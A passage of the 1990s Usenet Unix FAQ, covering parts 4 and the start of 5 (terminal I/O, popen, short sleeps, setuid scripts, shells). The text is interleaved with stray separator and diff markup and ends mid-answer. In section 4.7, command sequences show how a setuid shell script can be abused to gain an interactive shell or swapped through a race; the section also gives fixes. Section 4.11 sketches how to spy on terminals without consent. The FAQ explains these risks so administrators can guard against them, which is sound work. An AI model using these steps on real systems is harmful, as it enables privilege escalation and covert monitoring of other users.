This collection of documents is Copyright (c) 1994, Ted Timar, except
|
||||
Part 6, which is Copyright (c) 1994, Pierre Lewis and Ted Timar.
|
||||
All rights reserved. Permission to distribute the collection is
|
||||
hereby granted providing that distribution is electronic, no money
|
||||
is involved, reasonable attempts are made to use the latest version
|
||||
and all credits and this copyright notice are maintained.
|
||||
Other requests for distribution will be considered. All reasonable
|
||||
requests will be granted.
|
||||
|
||||
All information here has been contributed with good intentions, but
|
||||
none of it is guaranteed either by the contributors or myself to be
|
||||
accurate. The users of this information take all responsibility for
|
||||
any damage that may occur.
|
||||
|
||||
Many FAQs, including this one, are available on the archive site
|
||||
rtfm.mit.edu in the directory pub/usenet/news.answers.
|
||||
The name under which a FAQ is archived appears in the "Archive-Name:"
|
||||
line at the top of the article. This FAQ is archived as
|
||||
"unix-faq/faq/part[1-7]".
|
||||
|
||||
These articles are divided approximately as follows:
|
||||
|
||||
1.*) General questions.
|
||||
2.*) Relatively basic questions, likely to be asked by beginners.
|
||||
3.*) Intermediate questions.
|
||||
4.*) Advanced questions, likely to be asked by people who thought
|
||||
they already knew all of the answers.
|
||||
5.*) Questions pertaining to the various shells, and the differences.
|
||||
6.*) An overview of Unix variants.
|
||||
7.*) An comparison of configuration management systems (RCS, SCCS).
|
||||
|
||||
This article includes answers to:
|
||||
|
||||
4.1) How do I read characters from a terminal without requiring the user
|
||||
to hit RETURN?
|
||||
4.2) How do I check to see if there are characters to be read without
|
||||
actually reading?
|
||||
4.3) How do I find the name of an open file?
|
||||
4.4) How can an executing program determine its own pathname?
|
||||
4.5) How do I use popen() to open a process for reading AND writing?
|
||||
4.6) How do I sleep() in a C program for less than one second?
|
||||
4.7) How can I get setuid shell scripts to work?
|
||||
4.8) How can I find out which user or process has a file open or is using
|
||||
a particular file system (so that I can unmount it?)
|
||||
4.9) How do I keep track of people who are fingering me?
|
||||
4.10) Is it possible to reconnect a process to a terminal after it has
|
||||
been disconnected, e.g. after starting a program in the background
|
||||
and logging out?
|
||||
4.11) Is it possible to "spy" on a terminal, displaying the output
|
||||
that's appearing on it on another terminal?
|
||||
|
||||
If you're looking for the answer to, say, question 4.5, and want to skip
|
||||
everything else, you can search ahead for the regular expression "^4.5)".
|
||||
|
||||
While these are all legitimate questions, they seem to crop up in
|
||||
comp.unix.questions or comp.unix.shell on an annual basis, usually
|
||||
followed by plenty of replies (only some of which are correct) and then
|
||||
a period of griping about how the same questions keep coming up. You
|
||||
may also like to read the monthly article "Answers to Frequently Asked
|
||||
Questions" in the newsgroup "news.announce.newusers", which will tell
|
||||
you what "UNIX" stands for.
|
||||
|
||||
With the variety of Unix systems in the world, it's hard to guarantee
|
||||
that these answers will work everywhere. Read your local manual pages
|
||||
before trying anything suggested here. If you have suggestions or
|
||||
corrections for any of these answers, please send them to to
|
||||
tmatimar@isgtec.com.
|
||||
|
||||
|
||||
|
||||
Subject: How do I read characters ... without requiring the user to hit RETURN?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.1) How do I read characters from a terminal without requiring the user
|
||||
to hit RETURN?
|
||||
|
||||
Check out cbreak mode in BSD, ~ICANON mode in SysV.
|
||||
|
||||
If you don't want to tackle setting the terminal parameters
|
||||
yourself (using the "ioctl(2)" system call) you can let the stty
|
||||
program do the work - but this is slow and inefficient, and you
|
||||
should change the code to do it right some time:
|
||||
|
||||
#include <stdio.h>
|
||||
main()
|
||||
{
|
||||
int c;
|
||||
|
||||
printf("Hit any character to continue\n");
|
||||
/*
|
||||
* ioctl() would be better here; only lazy
|
||||
* programmers do it this way:
|
||||
*/
|
||||
system("/bin/stty cbreak"); /* or "stty raw" */
|
||||
c = getchar();
|
||||
system("/bin/stty -cbreak");
|
||||
printf("Thank you for typing %c.\n", c);
|
||||
|
||||
exit(0);
|
||||
}
|
||||
|
||||
Several people have sent me various more correct solutions to
|
||||
this problem. I'm sorry that I'm not including any of them here,
|
||||
because they really are beyond the scope of this list.
|
||||
|
||||
You might like to check out the documentation for the "curses"
|
||||
library of portable screen functions. Often if you're interested
|
||||
in single-character I/O like this, you're also interested in
|
||||
doing some sort of screen display control, and the curses library
|
||||
provides various portable routines for both functions.
|
||||
|
||||
|
||||
|
||||
Subject: How do I check to see if there are characters to be read ... ?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.2) How do I check to see if there are characters to be read without
|
||||
actually reading?
|
||||
|
||||
Certain versions of UNIX provide ways to check whether characters
|
||||
are currently available to be read from a file descriptor. In
|
||||
BSD, you can use select(2). You can also use the FIONREAD ioctl,
|
||||
which returns the number of characters waiting to be read, but
|
||||
only works on terminals, pipes and sockets. In System V Release
|
||||
3, you can use poll(2), but that only works on streams. In Xenix
|
||||
- and therefore Unix SysV r3.2 and later - the rdchk() system call
|
||||
reports whether a read() call on a given file descriptor will block.
|
||||
|
||||
There is no way to check whether characters are available to be
|
||||
read from a FILE pointer. (You could poke around inside stdio
|
||||
data structures to see if the input buffer is nonempty, but that
|
||||
wouldn't work since you'd have no way of knowing what will happen
|
||||
the next time you try to fill the buffer.)
|
||||
|
||||
Sometimes people ask this question with the intention of writing
|
||||
if (characters available from fd)
|
||||
read(fd, buf, sizeof buf);
|
||||
in order to get the effect of a nonblocking read. This is not
|
||||
the best way to do this, because it is possible that characters
|
||||
will be available when you test for availability, but will no
|
||||
longer be available when you call read. Instead, set the
|
||||
O_NDELAY flag (which is also called FNDELAY under BSD) using the
|
||||
F_SETFL option of fcntl(2). Older systems (Version 7, 4.1 BSD)
|
||||
don't have O_NDELAY; on these systems the closest you can get to
|
||||
a nonblocking read is to use alarm(2) to time out the read.
|
||||
|
||||
|
||||
|
||||
Subject: How do I find the name of an open file?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.3) How do I find the name of an open file?
|
||||
|
||||
In general, this is too difficult. The file descriptor may
|
||||
be attached to a pipe or pty, in which case it has no name.
|
||||
It may be attached to a file that has been removed. It may
|
||||
have multiple names, due to either hard or symbolic links.
|
||||
|
||||
If you really need to do this, and be sure you think long
|
||||
and hard about it and have decided that you have no choice,
|
||||
you can use find with the -inum and possibly -xdev option,
|
||||
or you can use ncheck, or you can recreate the functionality
|
||||
of one of these within your program. Just realize that
|
||||
searching a 600 megabyte filesystem for a file that may not
|
||||
even exist is going to take some time.
|
||||
|
||||
|
||||
|
||||
Subject: How can an executing program determine its own pathname?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.4) How can an executing program determine its own pathname?
|
||||
|
||||
Your program can look at argv[0]; if it begins with a "/", it is
|
||||
probably the absolute pathname to your program, otherwise your
|
||||
program can look at every directory named in the environment
|
||||
variable PATH and try to find the first one that contains an
|
||||
executable file whose name matches your program's argv[0] (which
|
||||
by convention is the name of the file being executed). By
|
||||
concatenating that directory and the value of argv[0] you'd
|
||||
probably have the right name.
|
||||
|
||||
You can't really be sure though, since it is quite legal for one
|
||||
program to exec() another with any value of argv[0] it desires.
|
||||
It is merely a convention that new programs are exec'd with the
|
||||
executable file name in argv[0].
|
||||
|
||||
For instance, purely a hypothetical example:
|
||||
|
||||
#include <stdio.h>
|
||||
main()
|
||||
{
|
||||
execl("/usr/games/rogue", "vi Thesis", (char *)NULL);
|
||||
}
|
||||
|
||||
The executed program thinks its name (its argv[0] value) is
|
||||
"vi Thesis". (Certain other programs might also think that
|
||||
the name of the program you're currently running is "vi Thesis",
|
||||
but of course this is just a hypothetical example, don't
|
||||
try it yourself :-)
|
||||
|
||||
|
||||
|
||||
Subject: How do I use popen() to open a process for reading AND writing?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.5) How do I use popen() to open a process for reading AND writing?
|
||||
|
||||
The problem with trying to pipe both input and output to an
|
||||
arbitrary slave process is that deadlock can occur, if both
|
||||
processes are waiting for not-yet-generated input at the same
|
||||
time. Deadlock can be avoided only by having BOTH sides follow a
|
||||
strict deadlock-free protocol, but since that requires
|
||||
cooperation from the processes it is inappropriate for a
|
||||
popen()-like library function.
|
||||
|
||||
The 'expect' distribution includes a library of functions that a
|
||||
C programmer can call directly. One of the functions does the
|
||||
equivalent of a popen for both reading and writing. It uses ptys
|
||||
rather than pipes, and has no deadlock problem. It's portable to
|
||||
both BSD and SV. See question 3.9 for more about 'expect'.
|
||||
|
||||
|
||||
|
||||
Subject: How do I sleep() in a C program for less than one second?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.6) How do I sleep() in a C program for less than one second?
|
||||
|
||||
The first thing you need to be aware of is that all you can
|
||||
specify is a MINIMUM amount of delay; the actual delay will
|
||||
depend on scheduling issues such as system load, and could be
|
||||
arbitrarily large if you're unlucky.
|
||||
|
||||
There is no standard library function that you can count on in
|
||||
all environments for "napping" (the usual name for short
|
||||
sleeps). Some environments supply a "usleep(n)" function which
|
||||
suspends execution for n microseconds. If your environment
|
||||
doesn't support usleep(), here are a couple of implementations
|
||||
for BSD and System V environments.
|
||||
|
||||
The following code is adapted from Doug Gwyn's System V emulation
|
||||
support for 4BSD and exploits the 4BSD select() system call.
|
||||
Doug originally called it 'nap()'; you probably want to call it
|
||||
"usleep()";
|
||||
|
||||
/*
|
||||
usleep -- support routine for 4.2BSD system call emulations
|
||||
last edit: 29-Oct-1984 D A Gwyn
|
||||
*/
|
||||
|
||||
extern int select();
|
||||
|
||||
int
|
||||
usleep( usec ) /* returns 0 if ok, else -1 */
|
||||
long usec; /* delay in microseconds */
|
||||
{
|
||||
static struct /* `timeval' */
|
||||
{
|
||||
long tv_sec; /* seconds */
|
||||
long tv_usec; /* microsecs */
|
||||
} delay; /* _select() timeout */
|
||||
|
||||
delay.tv_sec = usec / 1000000L;
|
||||
delay.tv_usec = usec % 1000000L;
|
||||
|
||||
return select( 0, (long *)0, (long *)0, (long *)0, &delay );
|
||||
}
|
||||
|
||||
On System V you might do it this way:
|
||||
|
||||
/*
|
||||
subseconds sleeps for System V - or anything that has poll()
|
||||
Don Libes, 4/1/1991
|
||||
|
||||
The BSD analog to this function is defined in terms of
|
||||
microseconds while poll() is defined in terms of milliseconds.
|
||||
For compatibility, this function provides accuracy "over the long
|
||||
run" by truncating actual requests to milliseconds and
|
||||
accumulating microseconds across calls with the idea that you are
|
||||
probably calling it in a tight loop, and that over the long run,
|
||||
the error will even out.
|
||||
|
||||
If you aren't calling it in a tight loop, then you almost
|
||||
certainly aren't making microsecond-resolution requests anyway,
|
||||
in which case you don't care about microseconds. And if you did,
|
||||
you wouldn't be using UNIX anyway because random system
|
||||
indigestion (i.e., scheduling) can make mincemeat out of any
|
||||
timing code.
|
||||
|
||||
Returns 0 if successful timeout, -1 if unsuccessful.
|
||||
|
||||
*/
|
||||
|
||||
#include <poll.h>
|
||||
|
||||
int
|
||||
usleep(usec)
|
||||
unsigned int usec; /* microseconds */
|
||||
{
|
||||
static subtotal = 0; /* microseconds */
|
||||
int msec; /* milliseconds */
|
||||
|
||||
/* 'foo' is only here because some versions of 5.3 have
|
||||
* a bug where the first argument to poll() is checked
|
||||
* for a valid memory address even if the second argument is 0.
|
||||
*/
|
||||
struct pollfd foo;
|
||||
|
||||
subtotal += usec;
|
||||
/* if less then 1 msec request, do nothing but remember it */
|
||||
if (subtotal < 1000) return(0);
|
||||
msec = subtotal/1000;
|
||||
subtotal = subtotal%1000;
|
||||
return poll(&foo,(unsigned long)0,msec);
|
||||
}
|
||||
|
||||
Another possibility for nap()ing on System V, and probably other
|
||||
non-BSD Unices is Jon Zeeff's s5nap package, posted to
|
||||
comp.sources.misc, volume 4. It does require a installing a
|
||||
device driver, but works flawlessly once installed. (Its
|
||||
resolution is limited to the kernel HZ value, since it uses the
|
||||
kernel delay() routine.)
|
||||
|
||||
Many newer versions of Unix have a nanosleep function.
|
||||
|
||||
|
||||
|
||||
Subject: How can I get setuid shell scripts to work?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.7) How can I get setuid shell scripts to work?
|
||||
|
||||
[ This is a long answer, but it's a complicated and frequently-asked
|
||||
question. Thanks to Maarten Litmaath for this answer, and
|
||||
for the "indir" program mentioned below. ]
|
||||
|
||||
Let us first assume you are on a UNIX variant (e.g. 4.3BSD or
|
||||
SunOS) that knows about so-called `executable shell scripts'.
|
||||
Such a script must start with a line like:
|
||||
|
||||
#!/bin/sh
|
||||
|
||||
The script is called `executable' because just like a real (binary)
|
||||
executable it starts with a so-called `magic number' indicating
|
||||
the type of the executable. In our case this number is `#!' and
|
||||
the OS takes the rest of the first line as the interpreter for
|
||||
the script, possibly followed by 1 initial option like:
|
||||
|
||||
#!/bin/sed -f
|
||||
|
||||
Suppose this script is called `foo' and is found in /bin,
|
||||
then if you type:
|
||||
|
||||
foo arg1 arg2 arg3
|
||||
|
||||
the OS will rearrange things as though you had typed:
|
||||
|
||||
/bin/sed -f /bin/foo arg1 arg2 arg3
|
||||
|
||||
There is one difference though: if the setuid permission bit for
|
||||
`foo' is set, it will be honored in the first form of the
|
||||
command; if you really type the second form, the OS will honor
|
||||
the permission bits of /bin/sed, which is not setuid, of course.
|
||||
|
||||
----------
|
||||
|
||||
OK, but what if my shell script does NOT start with such a `#!'
|
||||
line or my OS does not know about it?
|
||||
|
||||
Well, if the shell (or anybody else) tries to execute it, the OS
|
||||
will return an error indication, as the file does not start with
|
||||
a valid magic number. Upon receiving this indication the shell
|
||||
ASSUMES the file to be a shell script and gives it another try:
|
||||
|
||||
/bin/sh shell_script arguments
|
||||
|
||||
But we have already seen that a setuid bit on `shell_script' will
|
||||
NOT be honored in this case!
|
||||
|
||||
----------
|
||||
|
||||
Right, but what about the security risks of setuid shell scripts?
|
||||
|
||||
Well, suppose the script is called `/etc/setuid_script', starting
|
||||
with:
|
||||
|
||||
#!/bin/sh
|
||||
|
||||
Now let us see what happens if we issue the following commands:
|
||||
|
||||
$ cd /tmp
|
||||
$ ln /etc/setuid_script -i
|
||||
$ PATH=.
|
||||
$ -i
|
||||
|
||||
We know the last command will be rearranged to:
|
||||
|
||||
/bin/sh -i
|
||||
|
||||
But this command will give us an interactive shell, setuid to the
|
||||
owner of the script!
|
||||
Fortunately this security hole can easily be closed by making the
|
||||
first line:
|
||||
|
||||
#!/bin/sh -
|
||||
|
||||
The `-' signals the end of the option list: the next argument `-i'
|
||||
will be taken as the name of the file to read commands from, just
|
||||
like it should!
|
||||
|
||||
---------
|
||||
|
||||
There are more serious problems though:
|
||||
|
||||
$ cd /tmp
|
||||
$ ln /etc/setuid_script temp
|
||||
$ nice -20 temp &
|
||||
$ mv my_script temp
|
||||
|
||||
The third command will be rearranged to:
|
||||
|
||||
nice -20 /bin/sh - temp
|
||||
|
||||
As this command runs so slowly, the fourth command might be able
|
||||
to replace the original `temp' with `my_script' BEFORE `temp' is
|
||||
opened by the shell! There are 4 ways to fix this security hole:
|
||||
|
||||
1) let the OS start setuid scripts in a different, secure way
|
||||
- System V R4 and 4.4BSD use the /dev/fd driver to pass the
|
||||
interpreter a file descriptor for the script
|
||||
|
||||
2) let the script be interpreted indirectly, through a frontend
|
||||
that makes sure everything is all right before starting the
|
||||
real interpreter - if you use the `indir' program from
|
||||
comp.sources.unix the setuid script will look like this:
|
||||
|
||||
#!/bin/indir -u
|
||||
#?/bin/sh /etc/setuid_script
|
||||
|
||||
3) make a `binary wrapper': a real executable that is setuid and
|
||||
whose only task is to execute the interpreter with the name of
|
||||
the script as an argument
|
||||
|
||||
4) make a general `setuid script server' that tries to locate the
|
||||
requested `service' in a database of valid scripts and upon
|
||||
success will start the right interpreter with the right
|
||||
arguments.
|
||||
|
||||
---------
|
||||
|
||||
Now that we have made sure the right file gets interpreted, are
|
||||
there any risks left?
|
||||
|
||||
Certainly! For shell scripts you must not forget to set the PATH
|
||||
variable to a safe path explicitly. Can you figure out why?
|
||||
Also there is the IFS variable that might cause trouble if not
|
||||
set properly. Other environment variables might turn out to
|
||||
compromise security as well, e.g. SHELL... Furthermore you must
|
||||
make sure the commands in the script do not allow interactive
|
||||
shell escapes! Then there is the umask which may have been set
|
||||
to something strange...
|
||||
|
||||
Etcetera. You should realise that a setuid script `inherits' all
|
||||
the bugs and security risks of the commands that it calls!
|
||||
|
||||
All in all we get the impression setuid shell scripts are quite a
|
||||
risky business! You may be better off writing a C program instead!
|
||||
|
||||
|
||||
|
||||
Subject: How can I find out which user or process has a file open ... ?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.8) How can I find out which user or process has a file open or is using
|
||||
a particular file system (so that I can unmount it?)
|
||||
|
||||
Use fuser (system V), fstat (BSD), ofiles (public domain) or
|
||||
pff (public domain). These programs will tell you various things
|
||||
about processes using particular files.
|
||||
|
||||
A port of the 4.3 BSD fstat to Dynix, SunOS and Ultrix
|
||||
can be found in archives of comp.sources.unix, volume 18.
|
||||
|
||||
pff is part of the kstuff package, and works on quite a few systems.
|
||||
Instructions for obtaining kstuff are provided in question 3.10.
|
||||
|
||||
I've been informed that there is also a program called lsof. I
|
||||
don't know where it can be obtained.
|
||||
|
||||
Michael Fink <Michael.Fink@uibk.ac.at> adds:
|
||||
|
||||
If you are unable to unmount a file system for which above tools
|
||||
do not report any open files make sure that the file system that
|
||||
you are trying to unmount does not contain any active mount
|
||||
points (df(1)).
|
||||
|
||||
|
||||
|
||||
Subject: How do I keep track of people who are fingering me?
|
||||
>From: Jonathan I. Kamens
|
||||
>From: malenovi@plains.NoDak.edu (Nikola Malenovic)
|
||||
Date: Thu, 29 Sep 1994 07:28:37 -0400
|
||||
|
||||
4.9) How do I keep track of people who are fingering me?
|
||||
|
||||
Generally, you can't find out the userid of someone who is
|
||||
fingering you from a remote machine. You may be able to
|
||||
find out which machine the remote request is coming from.
|
||||
One possibility, if your system supports it and assuming
|
||||
the finger daemon doesn't object, is to make your .plan file a
|
||||
"named pipe" instead of a plain file. (Use 'mknod' to do this.)
|
||||
|
||||
You can then start up a program that will open your .plan file
|
||||
for writing; the open will block until some other process (namely
|
||||
fingerd) opens the .plan for reading. Now you can feed whatever you
|
||||
want through this pipe, which lets you show different .plan
|
||||
information every time someone fingers you. One program for
|
||||
doing this is the "planner" package in volume 41 of the
|
||||
comp.sources.misc archives.
|
||||
|
||||
Of course, this may not work at all if your system doesn't
|
||||
support named pipes or if your local fingerd insists
|
||||
on having plain .plan files.
|
||||
|
||||
Your program can also take the opportunity to look at the output
|
||||
of "netstat" and spot where an incoming finger connection is
|
||||
coming from, but this won't get you the remote user.
|
||||
|
||||
Getting the remote userid would require that the remote site be
|
||||
running an identity service such as RFC 931. There are now three
|
||||
RFC 931 implementations for popular BSD machines, and several
|
||||
applications (such as the wuarchive ftpd) supporting the server.
|
||||
For more information join the rfc931-users mailing list,
|
||||
>rfc931-users-request@kramden.acf.nyu.edu.
|
||||
|
||||
There are three caveats relating to this answer. The first is
|
||||
that many NFS systems won't recognize the named pipe correctly.
|
||||
This means that trying to read the pipe on another machine will
|
||||
either block until it times out, or see it as a zero-length file,
|
||||
and never print it.
|
||||
|
||||
The second problem is that on many systems, fingerd checks that
|
||||
the .plan file contains data (and is readable) before trying to
|
||||
read it. This will cause remote fingers to miss your .plan file
|
||||
entirely.
|
||||
|
||||
The third problem is that a system that supports named pipes
|
||||
usually has a fixed number of named pipes available on the
|
||||
system at any given time - check the kernel config file and
|
||||
FIFOCNT option. If the number of pipes on the system exceeds the
|
||||
FIFOCNT value, the system blocks new pipes until somebody frees
|
||||
the resources. The reason for this is that buffers are allocated
|
||||
in a non-paged memory.
|
||||
|
||||
|
||||
|
||||
Subject: Is it possible to reconnect a process to a terminal ... ?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.10) Is it possible to reconnect a process to a terminal after it has
|
||||
been disconnected, e.g. after starting a program in the background
|
||||
and logging out?
|
||||
|
||||
Most variants of Unix do not support "detaching" and "attaching"
|
||||
processes, as operating systems such as VMS and Multics support.
|
||||
However, there are three freely redistributable packages which can
|
||||
be used to start processes in such a way that they can be later
|
||||
reattached to a terminal.
|
||||
|
||||
The first is "screen," which is described in the
|
||||
comp.sources.unix archives as "Screen, multiple windows on a CRT"
|
||||
(see the "screen-3.2" package in comp.sources.misc, volume 28.)
|
||||
This package will run on at least BSD, System V r3.2 and SCO UNIX.
|
||||
|
||||
The second is "pty," which is described in the comp.sources.unix
|
||||
archives as a package to "Run a program under a pty session" (see
|
||||
"pty" in volume 23). pty is designed for use under BSD-like
|
||||
system only.
|
||||
|
||||
The third is "dislocate," which is a script that comes with the
|
||||
expect distribution. Unlike the previous two, this should run on
|
||||
all UNIX versions. Details on getting expect can be found in
|
||||
question 3.9 .
|
||||
|
||||
None of these packages is retroactive, i.e. you must have
|
||||
started a process under screen or pty in order to be able to
|
||||
detach and reattach it.
|
||||
|
||||
|
||||
|
||||
Subject: Is it possible to "spy" on a terminal ... ?
|
||||
Date: Wed, 28 Dec 1994 18:35:00 -0500
|
||||
|
||||
4.11) Is it possible to "spy" on a terminal, displaying the output
|
||||
that's appearing on it on another terminal?
|
||||
|
||||
There are a few different ways you can do this, although none
|
||||
of them is perfect:
|
||||
|
||||
* kibitz allows two (or more) people to interact with a shell
|
||||
(or any arbitary program). Uses include:
|
||||
|
||||
- watching or aiding another person's terminal session;
|
||||
- recording a conversation while retaining the ability to
|
||||
scroll backwards, save the conversation, or even edit it
|
||||
while in progress;
|
||||
- teaming up on games, document editing, or other cooperative
|
||||
tasks where each person has strengths and weakness that
|
||||
complement one another.
|
||||
|
||||
kibitz comes as part of the expect distribution. See question 3.9.
|
||||
|
||||
kibitz requires permission from the person to be spyed upon. To
|
||||
spy without permission requires less pleasant approaches:
|
||||
|
||||
* You can write a program that rummages through Kernel structures
|
||||
and watches the output buffer for the terminal in question,
|
||||
displaying characters as they are output. This, obviously, is
|
||||
not something that should be attempted by anyone who does not
|
||||
have experience working with the Unix kernel. Furthermore,
|
||||
whatever method you come up with will probably be quite
|
||||
non-portable.
|
||||
|
||||
* If you want to do this to a particular hard-wired terminal all
|
||||
the time (e.g. if you want operators to be able to check the
|
||||
console terminal of a machine from other machines), you can
|
||||
actually splice a monitor into the cable for the terminal. For
|
||||
example, plug the monitor output into another machine's serial
|
||||
port, and run a program on that port that stores its input
|
||||
somewhere and then transmits it out *another* port, this one
|
||||
really going to the physical terminal. If you do this, you have
|
||||
to make sure that any output from the terminal is transmitted
|
||||
back over the wire, although if you splice only into the
|
||||
computer->terminal wires, this isn't much of a problem. This is
|
||||
not something that should be attempted by anyone who is not very
|
||||
familiar with terminal wiring and such.
|
||||
|
||||
* The latest version of screen includes a multi-user mode.
|
||||
Some details about screen can be found in question 4.10.
|
||||
|
||||
* If the system being used has streams (SunOS, SVR4), the advise
|
||||
program that was posted in volume 28 of comp.sources.misc can
|
||||
be used. AND it doesn't requirethat it be run first (you do
|
||||
have to configure your system in advance to automatically push
|
||||
the advise module on the stream whenever a tty or pty is opened).
|
||||
|
||||
------------------------------
|
||||
|
||||
End of unix/faq Digest part 4 of 7
|
||||
**********************************
|
||||
|
||||
--
|
||||
Ted Timar - tmatimar@isgtec.com
|
||||
ISG Technologies Inc., 6509 Airport Road, Mississauga, Ontario, Canada L4V 1S7
|
||||
@@ -0,0 +1,292 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:10:14+08:00
|
||||
|
||||
====== Unix - Frequently Asked Questions (5-7) ======
|
||||
Created 星期二 07 六月 2011
|
||||
Message-ID: <unix-faq/faq/part5_1084272547@rtfm.mit.edu>
|
||||
X-Last-Updated: 1996/06/11
|
||||
From: tmatimar@isgtec.com (Ted Timar)
|
||||
Newsgroups: comp.unix.questions, comp.unix.shell
|
||||
Subject: Unix - Frequently Asked Questions (5/7) [Frequent posting]
|
||||
Date: 11 May 2004 10:50:00 GMT
|
||||
|
||||
Archive-name: unix-faq/faq/part5
|
||||
Version: $Id: part5,v 2.9 1996/06/11 13:07:56 tmatimar Exp $
|
||||
|
||||
These seven articles contain the answers to some Frequently Asked
|
||||
Questions often seen in comp.unix.questions and comp.unix.shell.
|
||||
Please don't ask these questions again, they've been answered plenty
|
||||
of times already - and please don't flame someone just because they may
|
||||
not have read this particular posting. Thank you.
|
||||
|
||||
This collection of documents is Copyright (c) 1994, Ted Timar, except
|
||||
Part 6, which is Copyright (c) 1994, Pierre Lewis and Ted Timar.
|
||||
All rights reserved. Permission to distribute the collection is
|
||||
hereby granted providing that distribution is electronic, no money
|
||||
is involved, reasonable attempts are made to use the latest version
|
||||
and all credits and this copyright notice are maintained.
|
||||
Other requests for distribution will be considered. All reasonable
|
||||
requests will be granted.
|
||||
|
||||
All information here has been contributed with good intentions, but
|
||||
none of it is guaranteed either by the contributors or myself to be
|
||||
accurate. The users of this information take all responsibility for
|
||||
any damage that may occur.
|
||||
|
||||
Many FAQs, including this one, are available on the archive site
|
||||
rtfm.mit.edu in the directory pub/usenet/news.answers.
|
||||
The name under which a FAQ is archived appears in the "Archive-Name:"
|
||||
line at the top of the article. This FAQ is archived as
|
||||
"unix-faq/faq/part[1-7]".
|
||||
|
||||
These articles are divided approximately as follows:
|
||||
|
||||
1.*) General questions.
|
||||
2.*) Relatively basic questions, likely to be asked by beginners.
|
||||
3.*) Intermediate questions.
|
||||
4.*) Advanced questions, likely to be asked by people who thought
|
||||
they already knew all of the answers.
|
||||
5.*) Questions pertaining to the various shells, and the differences.
|
||||
6.*) An overview of Unix variants.
|
||||
7.*) An comparison of configuration management systems (RCS, SCCS).
|
||||
|
||||
This article includes answers to:
|
||||
|
||||
5.1) Can shells be classified into categories?
|
||||
5.2) How do I "include" one shell script from within another
|
||||
shell script?
|
||||
5.3) Do all shells have aliases? Is there something else that
|
||||
can be used?
|
||||
5.4) How are shell variables assigned?
|
||||
5.5) How can I tell if I am running an interactive shell?
|
||||
5.6) What "dot" files do the various shells use?
|
||||
5.7) I would like to know more about the differences between the
|
||||
various shells. Is this information available some place?
|
||||
|
||||
If you're looking for the answer to, say, question 5.5, and want to skip
|
||||
everything else, you can search ahead for the regular expression "^5.5)".
|
||||
|
||||
While these are all legitimate questions, they seem to crop up in
|
||||
comp.unix.questions or comp.unix.shell on an annual basis, usually
|
||||
followed by plenty of replies (only some of which are correct) and then
|
||||
a period of griping about how the same questions keep coming up. You
|
||||
may also like to read the monthly article "Answers to Frequently Asked
|
||||
Questions" in the newsgroup "news.announce.newusers", which will tell
|
||||
you what "UNIX" stands for.
|
||||
|
||||
With the variety of Unix systems in the world, it's hard to guarantee
|
||||
that these answers will work everywhere. Read your local manual pages
|
||||
before trying anything suggested here. If you have suggestions or
|
||||
corrections for any of these answers, please send them to to
|
||||
tmatimar@isgtec.com.
|
||||
|
||||
|
||||
|
||||
Subject: Can shells be classified into categories?
|
||||
>From: wicks@dcdmjw.fnal.gov (Matthew Wicks)
|
||||
Date: Wed, 7 Oct 92 14:28:18 -0500
|
||||
|
||||
|
||||
5.1) Can shells be classified into categories?
|
||||
|
||||
In general there are two main class of shells. The first class
|
||||
are those shells derived from the Bourne shell which includes sh,
|
||||
ksh, bash, and zsh. The second class are those shells derived
|
||||
from C shell and include csh and tcsh. In addition there is rc
|
||||
which most people consider to be in a "class by itself" although
|
||||
some people might argue that rc belongs in the Bourne shell class.
|
||||
|
||||
With the classification above, using care, it is possible to
|
||||
write scripts that will work for all the shells from the Bourne
|
||||
shell category, and write other scripts that will work for all of
|
||||
the shells from the C shell category.
|
||||
|
||||
|
||||
|
||||
Subject: How do I "include" one shell script from within another shell script?
|
||||
>From: wicks@dcdmjw.fnal.gov (Matthew Wicks)
|
||||
Date: Wed, 7 Oct 92 14:28:18 -0500
|
||||
|
||||
5.2) How do I "include" one shell script from within another shell script?
|
||||
|
||||
All of the shells from the Bourne shell category (including rc)
|
||||
use the "." command. All of the shells from the C shell category
|
||||
use "source".
|
||||
|
||||
|
||||
|
||||
Subject: Do all shells have aliases? Is there something else that can be used?
|
||||
>From: wicks@dcdmjw.fnal.gov (Matthew Wicks)
|
||||
Date: Wed, 7 Oct 92 14:28:18 -0500
|
||||
|
||||
5.3) Do all shells have aliases? Is there something else that can be used?
|
||||
|
||||
All of the major shells other than sh have aliases, but they
|
||||
don't all work the same way. For example, some don't accept
|
||||
arguments.
|
||||
|
||||
Although not strictly equivalent, shell functions (which exist in
|
||||
most shells from the Bourne shell category) have almost the same
|
||||
functionality of aliases. Shell functions can do things that
|
||||
aliases can't do. Shell functions did not exist in bourne shells
|
||||
derived from Version 7 Unix, which includes System III and BSD 4.2.
|
||||
BSD 4.3 and System V shells do support shell functions.
|
||||
|
||||
Use unalias to remove aliases and unset to remove functions.
|
||||
|
||||
|
||||
|
||||
Subject: How are shell variables assigned?
|
||||
>From: wicks@dcdmjw.fnal.gov (Matthew Wicks)
|
||||
Date: Wed, 7 Oct 92 14:28:18 -0500
|
||||
|
||||
5.4) How are shell variables assigned?
|
||||
|
||||
The shells from the C shell category use "set variable=value" for
|
||||
variables local to the shell and "setenv variable value" for
|
||||
environment variables. To get rid of variables in these shells
|
||||
use unset and unsetenv. The shells from the Bourne shell
|
||||
category use "variable=value" and may require an "export
|
||||
VARIABLE_NAME" to place the variable into the environment. To
|
||||
get rid of the variables use unset.
|
||||
|
||||
|
||||
|
||||
Subject: How can I tell if I am running an interactive shell?
|
||||
>From: wicks@dcdmjw.fnal.gov (Matthew Wicks)
|
||||
>From: dws@ssec.wisc.edu (DaviD W. Sanderson)
|
||||
Date: Fri, 23 Oct 92 11:59:19 -0600
|
||||
|
||||
5.5) How can I tell if I am running an interactive shell?
|
||||
|
||||
In the C shell category, look for the variable $prompt.
|
||||
|
||||
In the Bourne shell category, you can look for the variable $PS1,
|
||||
